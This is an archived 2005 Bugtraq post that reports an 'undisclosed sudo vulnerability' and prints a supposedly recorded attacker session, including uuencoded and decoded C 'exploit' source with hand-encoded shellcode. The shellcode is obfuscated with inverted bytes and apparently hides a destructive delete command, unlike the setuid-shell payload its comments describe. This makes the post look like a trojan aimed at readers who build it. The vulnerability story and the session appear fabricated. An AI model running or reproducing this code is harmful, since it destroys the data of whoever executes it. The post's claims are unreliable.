lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050730124023.ML14362@rcert-s.army.mil>
Date: Sat, 30 Jul 2005 12:40:23 -0600
From: "Esler, Joel - Contractor" <joel.esler@...rt-s.army.mil>
To: bugtraq@...urityfocus.com
Subject: Undisclosed Sudo Vulnerability ?


About two weeks ago, our proprietary LIDS detected some suspicious shell
activity on an internal .mil machine i am in charged of. Our server runs
latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
Before shutting down the machine and reinstalling it from scratch, we
installed sebek module to monitor all shell activity. Based on the data
we gathered, it seems the attacker gained root privileges using an
undisclosed bug in latest sudo.

$ uname -a
Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 GNU/Linux

$ sudo -V
Sudo version 1.6.8p9

$ ls -al /tmp/.phc
-rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc

Here is an excerpt of a shell session we recorded:

<.........>
$ cat >blaat.uue<<'EH'
begin 600 sudoh.c
M+RH*("H@(&]F9B!B>2!O;F4@96)P(&]V97)W<FET92!I;B!S=61O('!R;VUP
M="!P87)S:6YG(&9U;F,@*&)G<F]U;F0@;6]D92!O;FQY*0H@*@H@*B`@(GDP
M+"!D;VXG="!A8G5S92!T:&ES('!R:78X(&5X<&QO:70@=&\@<FT@8F]X97,N
M(&LL=&AX(B`M(%)I8VAA<F0@2F]H;G-O;@H@*@H@*B`@...C("UP:7!E("UO
M('-U9&]H('-U9&]H+F,@.R`N+W-U9&]H"B`J"B`J("!H87!P>2!D96%T:&1A
M>2!R;W5T90H@*@H@*B\*"B-I;F-L=61E(#QS=&1I;RYH/@HC:6YC;'5D92`\
M=6YI<W1D+F@^"B-I;F-L=61E(#QS=')I;F<N:#X*(VEN8VQU9&4@...L;&]C
M82YH/@H*"B-D969I;F4@...$3U]04D]-4%0)(B5U0"5H/B!<7"4B"B-D969I
M;F4@<VAE;&QC;V1E"65S<`HC9&5F:6YE(%)%5%-?3E5-"3(T-B`O*B!G96YE
M<FEC("HO"B-D969I;F4@3D]04U].54T),3$V("\J(&=E;F5R:6,@*B\*"@HO
M*@H@*B`@...N=7@@>#@V(&YO;BUI;G1E<F%C=&EV92!E>&5C"B`J("![,"PQ
M+#)](&9D<R!A<F4@...O<V5D('5P;VX@...E8W5T:6]N(&]F('-H96QL8V]D
M92`H=7-E("(O8FEN+W-H("UC(BD*("HO"@IC:&%R(&5S<%M=(%]?871T<FEB
M=71E7U\@*"AS96-T:6]N*"(N=&5X="(I*2D@+RH@...S+G`@<F5L96%S92`J
M+PH)"3T@(EQX96)<>#-E7'@...QX,S%<>&,P7'@U,%QX-31<>#5A7'@X,UQX
M96-<>#8T7'@V."(*"0D@(")<>&9F7'AF9EQX9F9<>&9F7'@...QX9&9<>&0P
M7'AD9EQX9#E<>#8X7'@...QX.3DB"@D)("`B7'AD9EQX.#%<>#8X7'@...QX
M.3)<>&1F7'AD,EQX-31<>#5E7'AF-UQX,39<>&8W(@H)"2`@(EQX-39<>#`T
M7'AF-UQX-39<>#`X7'AF-UQX-39<>#!C7'@X,UQX8S1<>#<T7'@U-B(*"0D@
M(")<>#AD7'@W,UQX,#A<>#4V7'@U,UQX-31<>#4Y7'AB,%QX,&)<>&-D7'@X
M,%QX,S$B"@D)("`B7'AC,%QX-#!<>&5B7'AF.5QX93A<>&)D7'AF9EQX9F9<
M>&9F7'@...QX-C)<>#8Y(@H)"2`@(EQX-F5<>#)F7'@W,UQX-CA<>#`P7'@R
M9%QX-C-<>#`P(@H)"2`@(F-P("UP("]B:6XO<V@@+W1M<"\N<&AC.R!C:&UO
M9"`T-S4U("]T;7`O+G!H8SLB.PH@("`@("`@("`@("`@+RH@...B7'AC8UQX
M96)<>&9E(CL@*B\*"@H*=F]I9"!F:6QL("AC:&%R("IB=69F+"!I;G0@<VEZ
M92P@...S:6=N960@;&]N9R!V86PI"GL*"75N<VEG;F5D(&QO;F<@*G!T<B`]
M("AU;G-I9VYE9"!L;VYG("HI(&)U9F8["@H)9F]R("AS:7IE("\]('-I>F5O
M9B`H=6YS:6=N960@;&]N9RD[('-I>F4@...P.R!S:7IE+2TI("IP='(K*R`]
M('9A;#L*?0H*"G5N<VEG;F5D(&QO;F<@9V5T7W-P("AV;VED*0I["@E?7V%S
M;5]?("@B;&5A(&5S<"P@)65A>"(I.PI]"@H*8VAA<B`J=&@S,%]I>E]O=VXS
M9"`H8VAA<B!N;W!S7VYU;7,L(&-H87(@<F5T<U]N=6US+"!C:&%R("IS:&5L
M;&-O9&4I"GL*"6EN="!S:7IE(#T@<W1R;&5N("A3541/7U!23TU05"D@...N
M;W!S7VYU;7,@*R!R971S7VYU;7,@*R!S=')L96X@...H96QL8V]D92D["@EU
M;G-I9VYE9"!C:&%R("IN;W!S(#T@...L;V-A("AN;W!S7VYU;7,I.PH)=6YS
M:6=N960@...A<B`J<F5T<R`](&%L;&]C82`H<F5T<U]N=6US*3L*"75N<VEG
M;F5D(&QO;F<@<F5T(#T@...T7W-P("@I.PH)<W1A=&EC(&-H87(@97AP7V)U
M9F9E<B!;.#$Y,ET["@H)+RH@;6%K92!S=7)E('-U9&\@:7-A='1Y*"D@...I
M;',@*B\*"6-L;W-E("@P*3L@...O<V4@...I.R!C;&]S92`H,BD["@H)9FEL
M;"`H;F]P<RP@...N<VEG;F5D(&-H87(I(&YO<'-?;G5M<RP@,'@Y,#DP.3`Y
M,"D["@EF:6QL("AR971S+"`H=6YS:6=N960@...A<BD@<F5T<U]N=6US+"!R
M970I.PH*"2\J(&)E(&YI8V4@<&QZ("HO"@EI9B`H<VEZ92`^('-I>F5O9B`H
M97AP7V)U9F9E<BDI('L*"0EF<')I;G1F("AS=&1E<G(L(")B=69F97(G<R!T
M,#`@<VUA;&PN+EQN(BD["@D)<F5T=7)N($Y53$P["@E]"@H)<VYP<FEN=&8@
M*&5X<%]B=69F97(L('-I>F5O9B`H97AP7V)U9F9E<BDL("(E<R5S)7,E<R(L
M"@D)("!3541/7U!23TU05"P@+RH@...I;'H@<')O;7!T("HO"@D)("!N;W!S
M+`H)"2`@<VAE;&QC;V1E+`H)"2`@<F5T<RD["@H)+RH@...P;&]I="!B=69F
M("HO"@ER971U<FX@...P7V)U9F9E<CL*?0H*"@II;G0@;6%I;BAI;G0@87)G
M=BP@...A<B`J87)G8UM=*0I["@EC:&%R("IE>'!L;VET(#T@=&@S,%]I>E]O
M=VXS9"`H3D]04U].54TL(%)%5%-?3E5-+"!S:&5L;&-O9&4I.PH*"2\J('1H
M86YK<R!A9V%I;B!4,&1D(#HI("HO"@H)97AE8VP@*"(O=7-R+V)I;B]S=61O
M(BP@(B]U<W(O8FEN+W-U9&\B+"`B+6(B+"`B+7`B+"!E>'!L;VET+"`B+V)I
M;B]F86QS92(L($Y53$PI.PH*("`@("`@("`O*B!O:RP@<VAE;&QR;V]T('-H
M;W5L9"!A=V%I="!Y;W4@0"`B2$E35$9)3$4]+V1E=B]N=6QL("]T;7`O+G!H
88R`M<"(@*B\*"@ER971U<FX@,#L*?0H*
`
end
EH
$ uudecode blaat.uue
$ cat sudoh.c
/*
 *  off by one ebp overwrite in sudo prompt parsing func (bground mode only)
 *
 *  "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard Johnson
 *
 *  gcc -pipe -o sudoh sudoh.c ; ./sudoh
 *
 *  happy deathday route
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>


#define SUDO_PROMPT     "%u@%h> \\%"
#define shellcode       esp
#define RETS_NUM        246 /* generic */
#define NOPS_NUM        116 /* generic */


/*
 *  Linux x86 non-interactive exec
 *  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
 */

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
             /* = "\xcc\xeb\xfe"; */



void fill (char *buff, int size, unsigned long val)
{
        unsigned long *ptr = (unsigned long *) buff;

        for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = val;
}


unsigned long get_sp (void)
{
        __asm__ ("lea esp, %eax");
}


char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
{
        int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen (shellcode);
        unsigned char *nops = alloca (nops_nums);
        unsigned char *rets = alloca (rets_nums);
        unsigned long ret = get_sp ();
        static char exp_buffer [8192];

        /* make sure sudo isatty() fails */
        close (0); close (1); close (2);

        fill (nops, (unsigned char) nops_nums, 0x90909090);
        fill (rets, (unsigned char) rets_nums, ret);

        /* be nice plz */
        if (size > sizeof (exp_buffer)) {
                fprintf (stderr, "buffer's t00 small..\n");
                return NULL;
        }

        snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
                  SUDO_PROMPT, /* evilz prompt */
                  nops,
                  shellcode,
                  rets);

        /* exploit buff */
        return exp_buffer;
}



int main(int argv, char *argc[])
{
        char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);

        /* thanks again T0dd :) */

        execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, "/bin/false", NULL);

        /* ok, shellroot should await you @ "HISTFILE=/dev/null /tmp/.phc -p" */

        return 0;
}

$ gcc -pipe -o sudoh sudoh.c
{standard input}: Assembler messages:
{standard input}:5: Warning: Ignoring changed section attributes for .text
$ ./sudoh
$ cat /bin/cat > blaat.uue; rm blaat.uue
$ cat /bin/cat > sudoh.c; rm sudoh.c
$ cat /bin/cat > sudoh; rm sudoh
$ HISTFILE=/dev/null /tmp/.phc -p
id
uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
<.........>


Todd Miller, the maintainer of Sudo has been informed yesterday, and it
is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.


J

Joel Esler, GCIA
joel.esler@...rt-s.army.mil
706-791-7165 DSN: 780-7165


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ